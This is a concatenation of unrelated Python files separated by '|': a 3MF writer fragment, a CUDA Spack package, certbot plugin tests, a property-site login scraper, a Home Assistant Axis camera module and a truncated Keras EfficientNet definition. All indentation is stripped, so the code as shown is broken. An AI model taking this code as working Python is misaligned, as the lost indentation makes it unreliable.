savitar_node = self._convertUMNodeToSavitarNode(root_child, transformation_matrix)
if savitar_node:
savitar_scene.addSceneNode(savitar_node)
else:
savitar_node = self._convertUMNodeToSavitarNode(node, transformation_matrix)
if savitar_node:
savitar_scene.addSceneNode(savitar_node)
parser = Savitar.ThreeMFParser()
scene_string = parser.sceneToString(savitar_scene)
archive.writestr(model_file, scene_string)
archive.writestr(content_types_file, b'<?xml version="1.0" encoding="UTF-8"?> \n' + ET.tostring(content_types))
archive.writestr(relations_file, b'<?xml version="1.0" encoding="UTF-8"?> \n' + ET.tostring(relations_element))
except Exception as e:
Logger.logException("e", "Error writing zip file")
return False
finally:
if not self._store_archive:
archive.close()
else:
self._archive = archive
return True
|
import exporter
import dataset_export
import update_datastore_content #enter key as an argument
from sys import argv
script, env, res_id, api_key = argv
with open(env + '.csv', 'w') as f:
csv_string = exporter.export('https://' + env + '.data.gov.bc.ca', 'columns.json')
f.write(csv_string)
if __name__ == '__main__':
dataset_export.export_type(env)
update_datastore_content.update_resource(env, res_id, api_key)
|
from spack import *
from glob import glob
class Cuda(Package):
"""CUDA is a parallel computing platform and programming model invented
by NVIDIA. It enables dramatic increases in computing performance by
harnessing the power of the graphics processing unit (GPU).
Note: This package does not currently install the drivers necessary
to run CUDA. These will need to be installed manually. See:
https://docs.nvidia.com/cuda/ for details."""
homepage = "https://developer.nvidia.com/cuda-zone"
version('9.2.88', 'dd6e33e10d32a29914b7700c7b3d1ca0', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.2/Prod/local_installers/cuda_9.2.88_396.26_linux")
version('9.1.85', '67a5c3933109507df6b68f80650b4b4a', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.1/Prod/local_installers/cuda_9.1.85_387.26_linux")
version('9.0.176', '7a00187b2ce5c5e350e68882f42dd507', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run")
version('8.0.61', '33e1bd980e91af4e55f3ef835c103f9b', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/Prod2/local_installers/cuda_8.0.61_375.26_linux-run")
version('8.0.44', '6dca912f9b7e2b7569b0074a41713640', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda_8.0.44_linux-run")
version('7.5.18', '4b3bcecf0dfc35928a0898793cf3e4c6', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/7.5/Prod/local_installers/cuda_7.5.18_linux.run")
version('6.5.14', '90b1b8f77313600cc294d9271741f4da', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/6_5/rel/installers/cuda_6.5.14_linux_64.run")
def install(self, spec, prefix):
runfile = glob(join_path(self.stage.path, 'cuda*_linux*'))[0]
chmod = which('chmod')
chmod('+x', runfile)
runfile = which(runfile)
# Note: NVIDIA does not officially support many newer versions of
# compilers. For example, on CentOS 6, you must use GCC 4.4.7 or
# older. See:
# http://docs.nvidia.com/cuda/cuda-installation-guide-linux/#system-requirements
# https://gist.github.com/ax3l/9489132
# for details.
runfile(
'--silent', # disable interactive prompts
'--verbose', # create verbose log file
'--override', # override compiler version checks
'--toolkit', # install CUDA Toolkit
'--toolkitpath=%s' % prefix
)
|
from ming import *
import sys
srcdir=sys.argv[1]
m = SWFMovie();
font = SWFFont(srcdir + "/../Media/test.ttf")
text = SWFText(1)
w = font.getStringWidth("The quick brown fox jumps over the lazy dog. 1234567890")
text.setFont(font)
text.setColor(0,0,0,255)
text.setHeight(20)
text.moveTo(w,0)
text.addString("|")
m.add(text)
m.nextFrame()
m.save("test03.swf")
|
"""Tests for certbot.plugins.disco."""
import unittest
import mock
import pkg_resources
import zope.interface
from certbot import errors
from certbot import interfaces
from certbot.plugins import standalone
from certbot.plugins import webroot
EP_SA = pkg_resources.EntryPoint(
"sa", "certbot.plugins.standalone",
attrs=("Authenticator",),
dist=mock.MagicMock(key="certbot"))
EP_WR = pkg_resources.EntryPoint(
"wr", "certbot.plugins.webroot",
attrs=("Authenticator",),
dist=mock.MagicMock(key="certbot"))
class PluginEntryPointTest(unittest.TestCase):
"""Tests for certbot.plugins.disco.PluginEntryPoint."""
def setUp(self):
self.ep1 = pkg_resources.EntryPoint(
"ep1", "p1.ep1", dist=mock.MagicMock(key="p1"))
self.ep1prim = pkg_resources.EntryPoint(
"ep1", "p2.ep2", dist=mock.MagicMock(key="p2"))
# nested
self.ep2 = pkg_resources.EntryPoint(
"ep2", "p2.foo.ep2", dist=mock.MagicMock(key="p2"))
# project name != top-level package name
self.ep3 = pkg_resources.EntryPoint(
"ep3", "a.ep3", dist=mock.MagicMock(key="p3"))
from certbot.plugins.disco import PluginEntryPoint
self.plugin_ep = PluginEntryPoint(EP_SA)
def test_entry_point_to_plugin_name(self):
from certbot.plugins.disco import PluginEntryPoint
names = {
self.ep1: "p1:ep1",
self.ep1prim: "p2:ep1",
self.ep2: "p2:ep2",
self.ep3: "p3:ep3",
EP_SA: "sa",
}
for entry_point, name in names.iteritems():
self.assertEqual(
name, PluginEntryPoint.entry_point_to_plugin_name(entry_point))
def test_description(self):
self.assertEqual(
"Automatically use a temporary webserver",
self.plugin_ep.description)
def test_description_with_name(self):
self.plugin_ep.plugin_cls = mock.MagicMock(description="Desc")
self.assertEqual(
"Desc (sa)", self.plugin_ep.description_with_name)
def test_ifaces(self):
self.assertTrue(self.plugin_ep.ifaces((interfaces.IAuthenticator,)))
self.assertFalse(self.plugin_ep.ifaces((interfaces.IInstaller,)))
self.assertFalse(self.plugin_ep.ifaces((
interfaces.IInstaller, interfaces.IAuthenticator)))
def test__init__(self):
self.assertFalse(self.plugin_ep.initialized)
self.assertFalse(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
self.assertTrue(self.plugin_ep.problem is None)
self.assertTrue(self.plugin_ep.entry_point is EP_SA)
self.assertEqual("sa", self.plugin_ep.name)
self.assertTrue(self.plugin_ep.plugin_cls is standalone.Authenticator)
def test_init(self):
config = mock.MagicMock()
plugin = self.plugin_ep.init(config=config)
self.assertTrue(self.plugin_ep.initialized)
self.assertTrue(plugin.config is config)
# memoize!
self.assertTrue(self.plugin_ep.init() is plugin)
self.assertTrue(plugin.config is config)
# try to give different config
self.assertTrue(self.plugin_ep.init(123) is plugin)
self.assertTrue(plugin.config is config)
self.assertFalse(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
def test_verify(self):
iface1 = mock.MagicMock(__name__="iface1")
iface2 = mock.MagicMock(__name__="iface2")
iface3 = mock.MagicMock(__name__="iface3")
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin = mock.MagicMock()
exceptions = zope.interface.exceptions
with mock.patch("certbot.plugins."
"disco.zope.interface") as mock_zope:
mock_zope.exceptions = exceptions
def verify_object(iface, obj): # pylint: disable=missing-docstring
assert obj is plugin
assert iface is iface1 or iface is iface2 or iface is iface3
if iface is iface3:
raise mock_zope.exceptions.BrokenImplementation(None, None)
mock_zope.verify.verifyObject.side_effect = verify_object
self.assertTrue(self.plugin_ep.verify((iface1,)))
self.assertTrue(self.plugin_ep.verify((iface1, iface2)))
self.assertFalse(self.plugin_ep.verify((iface3,)))
self.assertFalse(self.plugin_ep.verify((iface1, iface3)))
def test_prepare(self):
config = mock.MagicMock()
self.plugin_ep.init(config=config)
self.plugin_ep.prepare()
self.assertTrue(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
# output doesn't matter that much, just test if it runs
str(self.plugin_ep)
def test_prepare_misconfigured(self):
plugin = mock.MagicMock()
plugin.prepare.side_effect = errors.MisconfigurationError
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin
self.assertTrue(isinstance(self.plugin_ep.prepare(),
errors.MisconfigurationError))
self.assertTrue(self.plugin_ep.prepared)
self.assertTrue(self.plugin_ep.misconfigured)
self.assertTrue(isinstance(self.plugin_ep.problem,
errors.MisconfigurationError))
self.assertTrue(self.plugin_ep.available)
def test_prepare_no_installation(self):
plugin = mock.MagicMock()
plugin.prepare.side_effect = errors.NoInstallationError
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin
self.assertTrue(isinstance(self.plugin_ep.prepare(),
errors.NoInstallationError))
self.assertTrue(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
def test_prepare_generic_plugin_error(self):
plugin = mock.MagicMock()
plugin.prepare.side_effect = errors.PluginError
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin
self.assertTrue(isinstance(self.plugin_ep.prepare(), errors.PluginError))
self.assertTrue(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
def test_repr(self):
self.assertEqual("PluginEntryPoint#sa", repr(self.plugin_ep))
class PluginsRegistryTest(unittest.TestCase):
"""Tests for certbot.plugins.disco.PluginsRegistry."""
def setUp(self):
from certbot.plugins.disco import PluginsRegistry
self.plugin_ep = mock.MagicMock(name="mock")
self.plugin_ep.__hash__.side_effect = TypeError
self.plugins = {"mock": self.plugin_ep}
self.reg = PluginsRegistry(self.plugins)
def test_find_all(self):
from certbot.plugins.disco import PluginsRegistry
with mock.patch("certbot.plugins.disco.pkg_resources") as mock_pkg:
mock_pkg.iter_entry_points.side_effect = [iter([EP_SA]),
iter([EP_WR])]
plugins = PluginsRegistry.find_all()
self.assertTrue(plugins["sa"].plugin_cls is standalone.Authenticator)
self.assertTrue(plugins["sa"].entry_point is EP_SA)
self.assertTrue(plugins["wr"].plugin_cls is webroot.Authenticator)
self.assertTrue(plugins["wr"].entry_point is EP_WR)
def test_getitem(self):
self.assertEqual(self.plugin_ep, self.reg["mock"])
def test_iter(self):
self.assertEqual(["mock"], list(self.reg))
def test_len(self):
self.assertEqual(1, len(self.reg))
self.plugins.clear()
self.assertEqual(0, len(self.reg))
def test_init(self):
self.plugin_ep.init.return_value = "baz"
self.assertEqual(["baz"], self.reg.init("bar"))
self.plugin_ep.init.assert_called_once_with("bar")
def test_filter(self):
self.plugins.update({
"foo": "bar",
"bar": "foo",
"baz": "boo",
})
self.assertEqual(
{"foo": "bar", "baz": "boo"},
self.reg.filter(lambda p_ep: str(p_ep).startswith("b")))
def test_ifaces(self):
self.plugin_ep.ifaces.return_value = True
# pylint: disable=protected-access
self.assertEqual(self.plugins, self.reg.ifaces()._plugins)
self.plugin_ep.ifaces.return_value = False
self.assertEqual({}, self.reg.ifaces()._plugins)
def test_verify(self):
self.plugin_ep.verify.return_value = True
# pylint: disable=protected-access
self.assertEqual(
self.plugins, self.reg.verify(mock.MagicMock())._plugins)
self.plugin_ep.verify.return_value = False
self.assertEqual({}, self.reg.verify(mock.MagicMock())._plugins)
def test_prepare(self):
self.plugin_ep.prepare.return_value = "baz"
self.assertEqual(["baz"], self.reg.prepare())
self.plugin_ep.prepare.assert_called_once_with()
def test_available(self):
self.plugin_ep.available = True
# pylint: disable=protected-access
self.assertEqual(self.plugins, self.reg.available()._plugins)
self.plugin_ep.available = False
self.assertEqual({}, self.reg.available()._plugins)
def test_find_init(self):
self.assertTrue(self.reg.find_init(mock.Mock()) is None)
self.plugin_ep.initalized = True
self.assertTrue(
self.reg.find_init(self.plugin_ep.init()) is self.plugin_ep)
def test_repr(self):
self.plugin_ep.__repr__ = lambda _: "PluginEntryPoint#mock"
self.assertEqual("PluginsRegistry(PluginEntryPoint#mock)",
repr(self.reg))
def test_str(self):
self.plugin_ep.__str__ = lambda _: "Mock"
self.plugins["foo"] = "Mock"
self.assertEqual("Mock\n\nMock", str(self.reg))
self.plugins.clear()
self.assertEqual("No plugins", str(self.reg))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import urllib2,urllib,sys,time
import cookielib,mechanize
import re
DEBUG =0
reload(sys)
sys.setdefaultencoding('utf8') #@UndefinedVariable
register_openers()
headers = {
'Host':'agent.anjuke.com',
'User-Agent' : 'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
#'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#'Accept-Language':'zh-cn,zh;q=0.5',
#'Accept-Encoding':'gzip, deflate',
#'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
'Keep-Alive':'115',
'Connection':'keep-alive',
}
class httpPost():
data = {}
def __init__(self,dataDic):
self.cookie = cookielib.CookieJar()
httpsHandler = urllib2.HTTPHandler()
httpsHandler.set_http_debuglevel(DEBUG)
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie),httpsHandler)
self.data = dataDic
def login1(self):
self.brow = mechanize.Browser()
httpHandler = mechanize.HTTPHandler()
httpsHandler = mechanize.HTTPSHandler()
httpHandler.set_http_debuglevel(DEBUG)
self.cookiejar = mechanize.LWPCookieJar()
#self.cookiejar = "Cookie lzstat_uv=34741959842666604402|1786789; Hm_lvt_976797cb85805d626fc5642aa5244ba0=1304534271541; ASPSESSIONIDQCDRAQBB=JHCHINLAHGMAIGBIFMNANLGF; lzstat_ss=2189193215_2_1304564199_1786789; Hm_lpvt_976797cb85805d626fc5642aa5244ba0=1304535401191"
self.opener = mechanize.OpenerFactory(mechanize.SeekableResponseOpener).build_opener(
httpHandler,httpsHandler,
mechanize.HTTPCookieProcessor(self.cookiejar),
mechanize.HTTPRefererProcessor,
mechanize.HTTPEquivProcessor,
mechanize.HTTPRefreshProcessor,
)
self.opener.addheaders = [("User-Agent","Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"),
("From", "")]
#self.opener.addheaders = [(
# "Referer", self.data['postUrl']
# )]
login={}
login['method'] = self.data['method']
login['name'] = self.data['name']
login['pwd'] = self.data['pwd']
loginUrl = self.data['loginUrl']+'?'+urllib.urlencode(login)
print loginUrl
response = mechanize.urlopen("http://esf.soufun.com/")
response = mechanize.urlopen(loginUrl)
print response.read().decode('gb2312')
def login(self):
self.cookie = cookielib.CookieJar()
httpsHandler = urllib2.HTTPHandler()
httpsHandler.set_http_debuglevel(DEBUG)
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie),httpsHandler)
login={}
login['act'] = self.data['act']
login['loginName'] = self.data['loginName']
login['history'] = ''
login['loginPasswd'] = self.data['loginPasswd']
loginUrl = self.data['loginUrl']
req = urllib2.Request(loginUrl,urllib.urlencode(login),headers)
r = self.opener.open(req)
res = None
for item in self.cookie:
#print item.name,item.value
if item.name == 'aQQ_ajklastuser':
res = item.value
return res
#aQQ_ajklastuser junyue_liuhua
#print self.opener.open('http://my.anjuke.com/v2/user/broker/checked/').read()
#open('login.txt','w').write(r.read().encode('utf-8'))
def post(self):
pass
|
from aquilon.worker.broker import BrokerCommand # pylint: disable=W0611
from aquilon.worker.commands.show_hostlink import CommandShowHostlink
class CommandShowHostlinkHostlink(CommandShowHostlink):
required_parameters = ["hostlink"]
|
import sqlalchemy
def upgrade(migrate_engine):
meta = sqlalchemy.MetaData(bind=migrate_engine)
stack = sqlalchemy.Table('stack', meta, autoload=True)
name_index = sqlalchemy.Index('ix_stack_owner_id', stack.c.owner_id,
mysql_length=36)
name_index.create(migrate_engine)
|
"""Support for Axis camera streaming."""
from homeassistant.components.camera import SUPPORT_STREAM
from homeassistant.components.mjpeg.camera import (
CONF_MJPEG_URL,
CONF_STILL_IMAGE_URL,
MjpegCamera,
filter_urllib3_logging,
)
from homeassistant.const import (
CONF_AUTHENTICATION,
CONF_DEVICE,
CONF_HOST,
CONF_MAC,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .axis_base import AxisEntityBase
from .const import DOMAIN as AXIS_DOMAIN
AXIS_IMAGE = "http://{}:{}/axis-cgi/jpg/image.cgi"
AXIS_VIDEO = "http://{}:{}/axis-cgi/mjpg/video.cgi"
AXIS_STREAM = "rtsp://{}:{}@{}/axis-media/media.amp?videocodec=h264"
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Axis camera video stream."""
filter_urllib3_logging()
serial_number = config_entry.data[CONF_MAC]
device = hass.data[AXIS_DOMAIN][serial_number]
config = {
CONF_NAME: config_entry.data[CONF_NAME],
CONF_USERNAME: config_entry.data[CONF_DEVICE][CONF_USERNAME],
CONF_PASSWORD: config_entry.data[CONF_DEVICE][CONF_PASSWORD],
CONF_MJPEG_URL: AXIS_VIDEO.format(
config_entry.data[CONF_DEVICE][CONF_HOST],
config_entry.data[CONF_DEVICE][CONF_PORT],
),
CONF_STILL_IMAGE_URL: AXIS_IMAGE.format(
config_entry.data[CONF_DEVICE][CONF_HOST],
config_entry.data[CONF_DEVICE][CONF_PORT],
),
CONF_AUTHENTICATION: HTTP_DIGEST_AUTHENTICATION,
}
async_add_entities([AxisCamera(config, device)])
class AxisCamera(AxisEntityBase, MjpegCamera):
"""Representation of a Axis camera."""
def __init__(self, config, device):
"""Initialize Axis Communications camera component."""
AxisEntityBase.__init__(self, device)
MjpegCamera.__init__(self, config)
async def async_added_to_hass(self):
"""Subscribe camera events."""
self.unsub_dispatcher.append(
async_dispatcher_connect(
self.hass, self.device.event_new_address, self._new_address
)
)
await super().async_added_to_hass()
@property
def supported_features(self):
"""Return supported features."""
return SUPPORT_STREAM
async def stream_source(self):
"""Return the stream source."""
return AXIS_STREAM.format(
self.device.config_entry.data[CONF_DEVICE][CONF_USERNAME],
self.device.config_entry.data[CONF_DEVICE][CONF_PASSWORD],
self.device.host,
)
def _new_address(self):
"""Set new device address for video stream."""
port = self.device.config_entry.data[CONF_DEVICE][CONF_PORT]
self._mjpeg_url = AXIS_VIDEO.format(self.device.host, port)
self._still_image_url = AXIS_IMAGE.format(self.device.host, port)
@property
def unique_id(self):
"""Return a unique identifier for this device."""
return f"{self.device.serial}-camera"
|
"""EfficientNet models for Keras.
Reference:
- [EfficientNet: Rethinking Model Scaling for Convolutional Neural Networks](
https://arxiv.org/abs/1905.11946) (ICML 2019)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import math
from tensorflow.python.keras import backend
from tensorflow.python.keras.applications import imagenet_utils
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.layers import VersionAwareLayers
from tensorflow.python.keras.utils import data_utils
from tensorflow.python.keras.utils import layer_utils
from tensorflow.python.lib.io import file_io
from tensorflow.python.util.tf_export import keras_export
BASE_WEIGHTS_PATH = 'https://storage.googleapis.com/keras-applications/'
WEIGHTS_HASHES = {
'b0': ('902e53a9f72be733fc0bcb005b3ebbac',
'50bc09e76180e00e4465e1a485ddc09d'),
'b1': ('1d254153d4ab51201f1646940f018540',
'74c4e6b3e1f6a1eea24c589628592432'),
'b2': ('b15cce36ff4dcbd00b6dd88e7857a6ad',
'111f8e2ac8aa800a7a99e3239f7bfb39'),
'b3': ('ffd1fdc53d0ce67064dc6a9c7960ede0',
'af6d107764bb5b1abb91932881670226'),
'b4': ('18c95ad55216b8f92d7e70b3a046e2fc',
'ebc24e6d6c33eaebbd558eafbeedf1ba'),
'b5': ('ace28f2a6363774853a83a0b21b9421a',
'38879255a25d3c92d5e44e04ae6cec6f'),
'b6': ('165f6e37dce68623721b423839de8be5',
'9ecce42647a20130c1f39a5d4cb75743'),
'b7': ('8c03f828fec3ef71311cd463b6759d99',
'cbcfe4450ddf6f3ad90b1b398090fe4a'),
}
DEFAULT_BLOCKS_ARGS = [{
'kernel_size': 3,
'repeats': 1,
'filters_in': 32,
'filters_out': 16,
'expand_ratio': 1,
'id_skip': True,
'strides': 1,
'se_ratio': 0.25
}, {
'kernel_size': 3,
'repeats': 2,
'filters_in': 16,
'filters_out': 24,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 5,
'repeats': 2,
'filters_in': 24,
'filters_out': 40,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 3,
'repeats': 3,
'filters_in': 40,
'filters_out': 80,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 5,
'repeats': 3,
'filters_in': 80,
'filters_out': 112,
'expand_ratio': 6,
'id_skip': True,
'strides': 1,
'se_ratio': 0.25
}, {
'kernel_size': 5,
'repeats': 4,
'filters_in': 112,
'filters_out': 192,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 3,
'repeats': 1,
'filters_in': 192,
'filters_out': 320,
'expand_ratio': 6,
'id_skip': True,
'strides': 1,
'se_ratio': 0.25
}]
CONV_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 2.0,
'mode': 'fan_out',
'distribution': 'truncated_normal'
}
}
DENSE_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 1. / 3.,
'mode': 'fan_out',
'distribution': 'uniform'
}
}
layers = VersionAwareLayers()
BASE_DOCSTRING = """Instantiates the {name} architecture.
Reference:
- [EfficientNet: Rethinking Model Scaling for Convolutional Neural Networks](
https://arxiv.org/abs/1905.11946) (ICML 2019)
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
If you have never configured it, it defaults to `"channels_last"`.
Arguments:
include_top: Whether to include the fully-connected
layer at the top of the network. Defaults to True.
weights: One of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded. Defaults to 'imagenet'.
input_tensor: Optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: Optional shape tuple, only to be specified
if `include_top` is False.
It should have exactly 3 inputs channels.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`. Defaults to None.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: Optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified. Defaults to 1000 (number of
ImageNet classes).
classifier_activation: A `str` or callable. The activation function to use
on the "top" layer. Ignored unless `include_top=True`. Set
`classifier_activation=None` to return the logits of the "top" layer.
Defaults to 'softmax'.
Returns:
A `keras.Model` instance.
"""
def EfficientNet(
width_coefficient,
depth_coefficient,
default_size,
dropout_rate=0.2,
drop_connect_rate=0.2,
depth_divisor=8,
activation='swish',
blocks_args='default',
model_name='efficientnet',
include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax'):
"""Instantiates the EfficientNet architecture using given scaling coefficients.
Reference:
- [EfficientNet: Rethinking Model Scaling for Convolutional Neural Networks](
https://arxiv.org/abs/1905.11946) (ICML 2019)
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Arguments:
width_coefficient: float, scaling coefficient for network width.
depth_coefficient: float, scaling coefficient for network depth.
default_size: integer, default input image size.
dropout_rate: float, dropout rate before final classifier layer.
drop_connect_rate: float, dropout rate at skip connections.
depth_divisor: integer, a unit of network width.
activation: activation function.
blocks_args: list of dicts, parameters to construct block modules.
model_name: string, model name.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False.
It should have exactly 3 inputs channels.
pooling: optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
classifier_activation: A `str` or callable. The activation function to use
on the "top" layer. Ignored unless `include_top=True`. Set
`classifier_activation=None` to return the logits of the "top" layer.
Returns:
A `keras.Model` instance.
Raises:
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
ValueError: if `classifier_activation` is not `softmax` or `None` when
using a pretrained top layer.
"""
if blocks_args == 'default':
blocks_args = DEFAULT_BLOCKS_ARGS
if not (weights in {'imagenet', None} or file_io.file_exists_v2(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
input_shape = imagenet_utils.obtain_input_shape(
input_shape,
default_size=default_size,
min_size=32,
data_format=backend.image_data_format(),
require_flatten=include_top,
weights=weights)
if input_tensor is None:
img_input = layers.Input(shape=input_shape)
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
def round_filters(filters, divisor=depth_divisor):
"""Round number of filters based on depth multiplier."""
filters *= width_coefficient
new_filters = max(divisor, int(filters + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_filters < 0.9 * filters:
new_filters += divisor
return int(new_filters)
def round_repeats(repeats):
"""Round number of repeats based on depth multiplier."""
return int(math.ceil(depth_coefficient * repeats))
# Build stem
x = img_input
x = layers.Rescaling(1. / 255.)(x)
x = layers.Normalization(axis=bn_axis)(x)
x = layers.ZeroPadding2D(
padding=imagenet_utils.correct_pad(x, 3),
name='stem_conv_pad')(x)
x = layers.Conv2D(
round_filters(32),
3,
strides=2,
padding='valid',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name='stem_conv')(x)
x = layers.BatchNormalization(axis=bn_axis, name='stem_bn')(x)
x = layers.Activation(activation, name='stem_activation')(x)
# Build blocks
blocks_args = copy.deepcopy(blocks_args)
b = 0
blocks = float(sum(round_repeats(args['repeats']) for args in blocks_args))
for (i, args) in enumerate(blocks_args):
assert args['repeats'] > 0
# Update block input and output filters based on depth multiplier.
args['filters_in'] = round_filters(args['filters_in'])
args['filters_out'] = round_filters(args['filters_out'])
for j in range(round_repeats(args.pop('repeats'))):
# The first block needs to take care of stride and filter size increase.
if j > 0:
args['strides'] = 1
args['filters_in'] = args['filters_out']
x = block(
x,
activation,
drop_connect_rate * b / blocks,
name='block{}{}_'.format(i + 1, chr(j + 97)),
**args)
b += 1
# Build top
x = layers.Conv2D(
round_filters(1280),
1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name='top_conv')(x)
x = layers.BatchNormalization(axis=bn_axis, name='top_bn')(x)
x = layers.Activation(activation, name='top_activation')(x)
if include_top:
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
if dropout_rate > 0:
x = layers.Dropout(dropout_rate, name='top_dropout')(x)
imagenet_utils.validate_activation(classifier_activation, weights)
x = layers.Dense(
classes,
activation=classifier_activation,
kernel_initializer=DENSE_KERNEL_INITIALIZER,
name='predictions')(x)
else:
if pooling == 'avg':
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
elif pooling == 'max':
x = layers.GlobalMaxPooling2D(name='max_pool')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = layer_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = training.Model(inputs, x, name=model_name)
# Load weights.
if weights == 'imagenet':
if include_top:
file_suffix = '.h5'
file_hash = WEIGHTS_HASHES[model_name[-2:]][0]
else:
file_suffix = '_notop.h5'
file_hash = WEIGHTS_HASHES[model_name[-2:]][1]
file_name = model_name + file_suffix
weights_path = data_utils.get_file(
file_name,
BASE_WEIGHTS_PATH + file_name,
cache_subdir='models',
file_hash=file_hash)
model.load_weights(weights_path)
elif weights is not None:
model.load_weights(weights)
return model
def block(inputs,
activation='swish',
drop_rate=0.,
name='',
filters_in=32,
filters_out=16,
kernel_size=3,
strides=1,
expand_ratio=1,
se_ratio=0.,
id_skip=True):
"""An inverted residual block.
Arguments:
inputs: input tensor.
activation: activation function.
drop_rate: float between 0 and 1, fraction of the input units to drop.
name: string, block label.
filters_in: integer, the number of input filters.
filters_out: integer, the number of output filters.
kernel_size: integer, the dimension of the convolution window.
strides: integer, the stride of the convolution.
expand_ratio: integer, scaling coefficient for the input filters.
se_ratio: float between 0 and 1, fraction to squeeze the input filters.
id_skip: boolean.
Returns:
output tensor for the block.
"""
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
# Expansion phase
filters = filters_in * expand_ratio
if expand_ratio != 1:
x = layers.Conv2D(
filters,
1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'expand_conv')(
inputs)
x = layers.BatchNormalization(axis=bn_axis, name=name + 'expand_bn')(x)
x = layers.Activation(activation, name=name + 'expand_activation')(x)
else:
x = inputs
# Depthwise Convolution
if strides == 2:
x = layers.ZeroPadding2D(
padding=imagenet_utils.correct_pad(x, kernel_size),
name=name + 'dwconv_pad')(x)
conv_pad = 'valid'
else:
conv_pad = 'same'
x = layers.DepthwiseConv2D(
kernel_size,
strides=strides,
padding=conv_pad,
use_bias=False,
depthwise_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'dwconv')(x)
x = layers.BatchNormalization(axis=bn_axis, name=name + 'bn')(x)
x = layers.Activation(activation, name=name + 'activation')(x)
# Squeeze and Excitation phase
